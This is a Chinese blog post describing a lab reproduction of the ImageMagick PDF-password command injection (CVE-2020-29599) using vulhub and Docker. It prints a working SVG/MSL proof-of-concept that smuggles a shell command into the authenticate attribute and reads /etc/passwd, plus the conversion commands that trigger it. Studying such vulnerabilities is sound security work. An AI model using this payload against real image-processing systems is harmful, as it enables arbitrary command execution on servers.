Imagemagick PDF密码位置命令注入漏洞

最新推荐文章于 2024-07-22 09:54:13 发布
最新推荐文章于 2024-07-22 09:54:13 发布
阅读量632 收藏
点赞数
分类专栏: 中间件漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/116298870
版权

声明

好好学习,天天向上

漏洞描述

ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。研究者@insertScript 发现在Imagemagick 7.0.10-35到7.0.10-40、6.9.11-35 up到6.9.11-40处理PDF的过程中存在一处命令注入漏洞,通过构造好的SVG格式图片文件,即可在Imagemagick中注入任意命令。

影响范围

7.0.10-35到7.0.10-40

6.9.11-35 up到6.9.11-40

复现过程

这里使用7.0.10-36版本

使用vulhub

/app/vulhub-master/imagemagick/pdf-password-rce

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,构造一个svg,可以看到vulhub为我们提供的poc.svg里面的代码,我们构造一个这种恶意图片,让使用者在使用的时候,执行第一行的echo $(id)命令,如果执行成功应该会吧id写在0wned文件中

<image authenticate='ff" `echo $(id)> ./0wned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

在这里插入图片描述

进入docker,使用这个工具进行图片操作

docker-compose run im bash
cd /tmp/
ls
identify poc.svg
convert poc.svg poc.png
ls

执行完后,查看文件,内容已经替换

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
Imagemagick PDF密码位置命令注入漏洞(CVE-2020-29599)复现
玄道的网安博客
04-07 1233
漏洞概述 ImageMagick是一款使用量很广的图片处理程序,ImageMagick之前6.9.11-40和7。在7.0.10-40之前的x错误地处理了-authenticate选项,该选项允许为密码保护的PDF文件设置密码。用户控制的密码没有被正确转义,因此可以通过构造好的SVG格式图片文件,即可在Imagemagick注入任意命令。 环境搭建 https://github.com/vulhub/vulhub/tree/master/imagemagick/CVE-2020-...
vulhub漏洞复现27_Imagemagick
weixin_44193247的博客
02-02 1151
vulhub漏洞复现练习篇
深入浅析ImageMagick命令执行漏洞
09-21
ImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。接下来通过本文给大家浅析ImageMagick命令执行漏洞的知识,一起看看吧
ImageMagick
$firecat利白的代码足迹$
12-02 403
使用ImageMagick的创建,编辑,撰写,或转换位图图像。它可以读取和写入各种格式(超过200种)的图像,包括PNG,JPEG,GIF,HEIC,TIFF,DPX,EXR,WebP,Postscript,PDF和SVG。使用ImageMagick可以调整图像大小,翻转,镜像,旋转,变形,剪切和变换图像,调整图像颜色,应用各种特殊效果或绘制文本,线条,多边形,椭圆和贝塞尔曲线。 ImageMa...
ImageMagick命令注入漏洞(CVE-2016–3714)
HEAVEN569的博客
06-28 1290
震惊!!看图片也能中招!
Imagemagick PDF密码位置命令注入漏洞(CVE-2020-29599)
EC_Carrot的博客
07-02 743
漏洞背景 ImageMagick 6.9.11-40版本和7.x版本和7.0.10-40之前版本存在安全漏洞,该漏洞源于错误地处理了-authenticate选项,该选项允许为受密码保护的PDF文件设置密码。用户控制的密码没有被正确地转义,因此有可能通过程序员的pdf.c注入额外的shell命令漏洞复现 我这里用的是vulhub的环境,环境中svg文件已经上传至tmp目录下,进入靶机后,使用命令转换svg文件即可触发命令注入,并将输出结果写入到0wned文件内: convert poc.svg poc
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 3069
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
常见漏洞知识库(原理/场景/修复)
lefooter的博客
04-30 6328
SQL 注入 0x01 漏洞描述 SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验(类型、长度、业务参数合法性等),同时没有对用户输入数据进行有效地特殊字符过滤,使得用户的输入直接带入数据库执行,超出了SQL语句原来设计的预期结果,导致了SQL注入漏洞。 0x02 常见应用场景 SQL注入漏洞可能出现在一切与数据库交互的地方,比如常见的查询用户信息、查询订单信...
SSRF漏洞浅析+ctfhub简单实战
热门推荐
wo41ge的博客
03-27 2万+
花时间 写一下SSRF 凑合看吧 2020/3/24 14.26 漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。 正是因为恶意请求由服务端发起,而服务端能够请求到与自身相连而与外网隔绝的内部网络系统,所以一般情况下,SSRF的攻击目标是攻击者无法直接访问的内网系统。 ssrf csrf 重放攻击 换行注入 漏洞成因 SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地
(最全干货分享)渗透测试全流程归纳总结之四
深入交流学习:webMsec
04-19 513
0x02 漏洞挖掘 1.漏洞扫描工具 注意:登录类网站扫描要带cookies扫才能扫到 1.1Nikto Web服务漏洞扫描器 Tips:利用-Format选项来导出特定格式的扫描结果,使扫描结果更容易阅读和分析。 nikto -host http://example.com -output ~/nikto.html -Format html NIKTO使用方法: 1、命令:nikto -update #升级,更新插件; 2、Nikto -list-plugins #查看插件; 3、Nikto -host
SQL注入攻击与防御.pdf
08-16
SQL注入攻击与防御.pdf
PDF密码清除(解除限制).zip
07-21
PDF密码清除(解除限制).zip
ImageMagick 命令执行漏洞
kuiguowei的博客
01-16 2819
docker Docker是由一家叫做Dotcloud的公司出品。 Docker是一个由GO语言写的程序运行的容器; 目前云服务的基石是操作系统级别的隔离,在同一台物理服务器上虚拟出多个主机。Docker则实现了一种应用程序级别的隔离; 它改变我们基本的开发、操作单元,由直接操作虚拟主机(VM),转换到操作程序运行的“容器”上来。 它也是一个开源的应用容器引擎,让开发者可以打包他们的应用以及
ImageMagick爆高危命令执行漏洞
煜铭2011
05-09 1万+
0x01 前言 ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及PhotoCD等格式。众多的网站平台都是用他渲染处理图片。可惜在3号时被公开了一些列漏洞,其中一个漏洞可导致远程执行代码(RCE),如果你处理用户提交的图片。该漏洞是针对在野外使用此漏洞。许多图...
ImageMagick 命令注入漏洞 (CVE-2023-34153)
最新发布
无问社区的博客
07-22 410
HVV开始了之后会更新部分相关的指南和总结,本文是漏洞的一个复现~
Imagemagick 命令注入漏洞 (CVE-2016–3714)
zzzzz1284的博客
01-16 232
CVE-2016–3714
漏洞复现】ImageMagick命令注入漏洞(CVE-2016–3714/15/16/17/18)
m0_52923241的博客
04-03 1614
ImageMagic是一款图片处理工具,当传入一个恶意图片时,就有可能存在命令注入漏洞ImageMagick默认支持一种图片格式mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。影响ImageMagick 6.9.3-9以前的所有版本。
php imagemagick 漏洞,ImageMagick popen_utf8命令注入 漏洞报告
weixin_28956753的博客
03-10 212
Author: niubl(知道创宇404安全实验室)Date: 2016-05-07一、漏洞概要i. 漏洞描述ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。我发现当用户传入一个包含|竖线的文件名的时候,就有可能触发命令注入漏洞。ii. 漏洞影响测试:ImageMagick-7.0.1-2.tar.bz2iii...
技术分享:Adobe Reader9 PDF攻击漏洞复现
liu914589417的博客
05-05 1013
技术分享:Adobe Reader9 PDF攻击漏洞复现 实验工具 1、 VMware虚拟机 2、 Kali 2021 系统虚拟机 3、Windows XP系统虚拟机 1、在VMware中打开Kali 2021虚拟机和Windows XP虚拟机,并确保两台机器能够互相【Ping】通,网络连接正常。 2、确定能连通后,回到Kali 2021虚拟机,打开两个终端,分别开启【MSF攻击框架】,输入命令【msfconsole】。 3、在其中一个MSF攻击框架中输入命令,生成PDF文件,输入命令加载漏洞模块。命令
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值